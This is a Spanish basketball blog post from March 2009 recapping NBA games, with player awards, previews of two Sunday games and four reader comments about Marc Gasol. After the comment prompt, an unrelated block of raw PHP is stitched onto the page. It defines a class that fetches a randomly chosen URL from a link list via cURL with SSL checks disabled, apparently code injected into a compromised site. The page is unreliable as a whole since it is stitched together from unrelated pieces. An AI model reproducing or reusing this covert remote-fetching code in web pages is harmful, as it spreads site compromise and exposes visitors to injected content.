La crónica (7/03/2009)

08 de March de 2009 por Jabho

Ya decíamos ayer que el duelo de la noche era LeBron vs. Wade. Quién esperara 50 puntos de ambos se sentirá decepcionado. Pero aunque no parezcan actuaciones estratosféricas el caso es que los 25 puntos, 12 asistencias y 8 rebotes de Wade no están al alcance de cualquiera. Y James si bien continuó errático en el tiro, se marchó con un triple doble para su casa. La cosa es que el partido fue espeso, duro y muy disputado. Se decidió a fala de pocos segundos trás la expulsión por doble técnica de Wade que protestó junto a su entrenador una posible falta sobre el mismo. Palmaron los Heat pero empiezan a mostrarse como un equipo a eludir en primavera. Ayer nos decían que molaba Mo Williams supongo que por partidos como el de ayer, en el que fue el máximo responsable de la victoria Cav.

Del resto de partidos detaca la victoria de los Bobcats ante los Knicks. Los Bobcats llevan 6 seguidas y amenazan Play Offs. Ayer Larry Brown se vengó de su ex – equipo y pocas veces veremos a su equipo en guarismos tan altos. Diaw sigue muy fino y, aunque lo tienen diíicil, tiene pinta que quieren dar guerra. 

También ayer pusimos el punto de mira sobre Villanueva. Nos equivocamos pero por poco. Los Bucks vencieron a los Warriors y fue Jefferson el que hizo su mejor marca anotadora de la temporada…A Crawford parace que no lo quieren en San Francisco, pero  si sigue a este nivel digo yo que alguien lo querrá ¿no?

En el resto de la jornada los Hawks vencieron a los Pistons en duelo importante en la lucha por el top 4 del Este y jugar en casa al menos la primera ronda, los Sixers vencieron con dificultades a los Grizzilies con unos tremendos Marc&Conley, los Mavericks tambien vencieron con facilidad a los Wizards y tambien de la mano de unos estelares Nowiztki&Terry, los Blazers con más dificultad y con Roy se deshicieron de los Wolves, los Hornets prolongaron su racha de 7 victorias seguidas y vencieron a unos Thunder que sin Durant ni Green encuentra en los buenos partidos de Westbrook el único aliciente, y por último los Pacers vencieron a los Clippers, que a pesar del gran partido del novato Gordon son, inesperadamente, uno de los peores equipos de la liga.

 

PREMIOS

MVP: Mo Williams, Brandon Roy, Jefferson o incluso Gerald Wallace hubieran sido justos ganadores del premio anoche. Pero la mejor actuación con victoria de su equipo corresponde para el alemán Dirk Nowiztki con sus 34 puntos, 9 rebotes y 7 asistencias. Los Mavericks siguen clasificados para Play Offs y mucho se lo deben agradecer a su estrella.

Rookie: Pues no faltan candidatos anoche con buenos partidos de Beasley o Westbrook, pero todos lejos de 2 que sobresalieron y mucho, a pesar de que ambos perdieron. Eric Gordon fue el mejor de los tristes Clippers con sus 35 puntos y 6 asistencias, con 5 de 6 triples y 12 de 18 en total de tiro. Pero el premio se lo lleva Marc Gasol: Pedazo de temporada la de Marc que debería hacer reflexionar a sus entrenadores el rol en los sistemas que debería jugar. Anoche fue su mejor partido del año con 30 puntos, 13 rebotes y 3 tapones… Los ositos se llevan de este año las buenas temporadas de Mayo y Gasol, ahora hay que saber gestionar sus siguientes pasos…

Sorpresa: Hoy los premios son cosa de 2. Bueno de uno y otro que se queda cerca. Cerca se quedó del premio anoche Julian Wright. El tipo es muy, muy irregular y llegó demasiado verde a la liga. pero clase tiene de sobra y con Scott y Paul a su lado debería acabar confirmándola. El premio sin embargo fue para Conley que también hizo su mejor partido de la tempoarada con 31 puntos y 9 asistencias.

Decepción: Pues ninguna actuazión lamentable al menos de alguien de quién esperamos que juegue bien. Tipos como Prince o Marvin Williams no estuvieron finos, pero tampoco tan mal como para premiarles. Me quedo con la temporada de Golden State Warriors. Yo fui un creyente hace un par de años y me da pena jugar a ver si aciertas que jugador hará su partido del año al jugar contra ellos… 

Mayor esfuerzo en Vano: Para los Grizzilies Conley&Gasol que superaron la treintena pero no fue suficiente.

RAZONES PARA TRASNOCHAR

Los domingos es día de doble cabecera en la televisión americana y siempre dos partidos de máximos interes. Hoy toca uno en cada conferencia (a partir de las 7 de la tarde):

Magic@Celtics: Ya no sólo porque sean 2º y 3º en la conferencia Este, sino porque la ventaja de campo se antoja crucial para los verdes, porque los Magic deben sentirse capaces de ganar a los grandes a pesar de la ausencia de Nelson, porque ahora mismo se verían las caras en semifinales de conferencia,…Razones de sobra. Falta Garnett y eso, que siempre es importante, se puede convertir en decisivo cuando enfrente está Howard… Partidazo con dos all-around jugadores que marcan el ritmo de sus equipos; Pierce que se está echando el equipo a cuestas en ausencia de Garnett y Turkoglu que tiene la intención de pasar por caja este verano. Dos de los mejores tiradores de la liga, ex-compañeros además, con Rondo, con Alston…

Suns@Spurs: Los Spurs navegan cómodamente a ritmo de crucero. Están acostumbrados. Esperaran los Play Offs con el recien fichado Gooden y la vuelta, esperemos, de Manu ¿será suficiente contra los Lakers? Casi es la única incognita, porque la edad no perdona y no quedan demasiados años impares en las etapas de ese viaje que hacemos con ellos. Se han movido bien y ahora deben esperar a confirmar que es suficiente. Enfrente los Suns, a 3.5 partidos de Play Offs que serán más si pierden. Y eso a pesar del renacer de Shaq. El cambio de entrandor y de ritmo arrancó con buenas perpectivas pero ahora encadenan 3 derrotas seguidas….Shaq contra Duncan, 8 anillos y dos estilos distintos de vivir y de jugar, pero ambos dominantes como ninguno en las zonas de la ultima decada y pico.

El declive de los Suns es evidente y quizás demasiado pronunciado. Si me preguntan a mí diría que empezó con el triple de Duncan en la prórroga del primer partido de la serie del año pasado. Pocas derrotas habrán sido mas dolorosas que esa.Si fuera de los Suns saldría con el cuchillo entre los dientes…

 

 

Comenta

4 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Vaya semanita de Marc Gasol:

    @LAL – 34 min – 17 ptos – 14 reb – 4 asis – 36 eff
    @LAC – 42 min – 20 ptos – 8 reb – 10 asis – 35 eff
    PHI – 39 min – 30 ptos -13 reb – 2 asis – 39 eff
    ======================================
    38,3 min – 22,3 ptos – 75% tc -11,7 reb – 5,3 asis – 1,3 rob – 3 tap – 36,7 Effi

    me acabo de ver el partido contra philadelphia, hacia bastantes semanas que no veia nada de memphis y me ha dado la sensación que Marc se está adaptando a la NBA bastante bien. Que pena que esté en la franquicia con menos caracter ganador de la liga….

      Citar

  2. Elio dice:
    #2

    Me da a mi que Marc Gasol va a estar muchos años en la NBA y que no se va a tirar 7 años como su hermano en Memphis, ha aprendido la lección y no creo que renueve por los ositos de las narices.

      Citar

  3. Txusma dice:
    #3

    Veremos que tal anda Memphis de aqui 2 temporadas. Para este verano liberan mucho dinero y a lo mejor engañan a alguien.

      Citar

  4. couxe dice:
    #4

    Es una pena que pese a su calidad actual y a su potencial ofensivo apenas le concedan balones en ataque, y tenga que vivir de los rebotes que consigue o de segundas jugadas no preparadas para él…
    Pero bueno, por fortuna el tiempo suele poner a todo el mundo en su lugar, y seguramente acabará siendo un jugador importante, ya sea en Memphis o en otro equipo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>